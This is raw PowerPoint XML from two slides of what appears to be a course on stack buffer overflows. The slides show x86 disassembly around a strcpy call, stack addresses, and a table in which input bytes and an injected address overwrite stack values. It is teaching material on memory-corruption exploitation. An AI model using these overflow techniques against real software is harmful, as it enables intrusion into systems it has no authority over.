          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946821" y="1567206"/>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="359330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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="930259"/>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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386297907"/>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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110923" y="138254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46822" y="119787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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="181788"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0xbffff68c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e67</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2"/>
            <a:ext cx="6256324" cy="395369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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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$0xa,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946821" y="1567206"/>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="389514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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="930259"/>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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="665858068"/>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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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179</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="100891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46822" y="119787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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="181788" y="4851498"/>
          <a:ext cx="3696160" cy="1514336"/>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0xbffff690</a:t>
                      </a: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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="190042"/>
            <a:ext cx="6256324" cy="395369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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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$0xa,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946821" y="1567206"/>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
